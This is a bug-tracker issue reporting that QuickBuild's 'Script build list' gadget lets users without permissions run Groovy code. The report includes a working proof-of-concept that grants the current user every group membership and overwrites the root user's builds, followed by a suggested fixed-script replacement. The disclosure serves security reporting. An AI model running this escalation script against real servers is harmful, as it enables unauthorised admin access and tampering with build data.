| << Back to previous view |
|
[DEMO-20] Serious error related to the execute script.
|
|
| Status: | Open |
| Project: | Demo |
| Component/s: | None |
| Affects Version/s: | None |
| Fix Version/s: | None |
| Type: | Bug | Priority: | Critical |
| Reporter: | Nguyen Duc Long | Assigned To: | Demo Project |
| Resolution: | Unresolved | Votes: | 0 |
| Remaining Estimate: | Unknown | Time Spent: | Unknown |
| Original Estimate: | Unknown | ||
| Description |
|
The right to create and execute code is granted in many places. In particular, users do not need any permissions to use the "Script build list" gadget.
Example of a dangerous script use for Script build list. ``` groovy: import com.pmease.quickbuild.Context; import com.pmease.quickbuild.model.Build; import com.pmease.quickbuild.SearchCriteria; import org.hibernate.criterion.Restrictions; import org.hibernate.criterion.Criterion; import org.hibernate.criterion.Order; import com.pmease.quickbuild.entitymanager.BuildManager; import com.pmease.quickbuild.model.Group import com.pmease.quickbuild.entitymanager.GroupManager import com.pmease.quickbuild.model.User import com.pmease.quickbuild.entitymanager.UserManager import com.pmease.quickbuild.model.Membership; import com.pmease.quickbuild.entitymanager.MembershipManager; // --- Hack admin permission --- Collection<Group> groups = GroupManager.instance.getAll() MembershipManager.instance.assign(Context.getUser(), groups, false) // --- End - Hack admin permission --- // --- Hack builds of root user --- User rootUser = UserManager.instance.get(1) Criterion[] criterions = [Restrictions.eq("requester", rootUser)]; Order[] orders = [Order.desc("beginDate")]; def criteria = new SearchCriteria(criterions, orders); def builds = system.buildManager.search(criteria, 0, 10); for(Build build in builds){ build.setVersion("Hacked") BuildManager.instance.save(build); } // --- End - Hack builds of root user --- return new ArrayList<Build>(); ``` With "Script build list" gadget. I suggest editing it to "My build" gadget. It contains a fixed script instead of allowing filling. Example: ``` groovy: import com.pmease.quickbuild.Context; import com.pmease.quickbuild.model.Build; import com.pmease.quickbuild.SearchCriteria; import org.hibernate.criterion.Restrictions; import org.hibernate.criterion.Criterion; import org.hibernate.criterion.Order; if (Context.getUser() != null) { Criterion[] criterions = [Restrictions.eq("requester", Context.getUser())]; Order[] orders = [Order.desc("beginDate")]; def criteria = new SearchCriteria(criterions, orders); return system.buildManager.search(criteria, 0, #limit_setting(default=10)); } else { return new ArrayList<Build>(); } ``` |
| Comments |
| Comment by Nguyen Duc Long [ 29/Jan/26 11:08 AM ] |
| Sorry, this is a Quickbuild project issue. I placed it in the wrong location. Please close it. |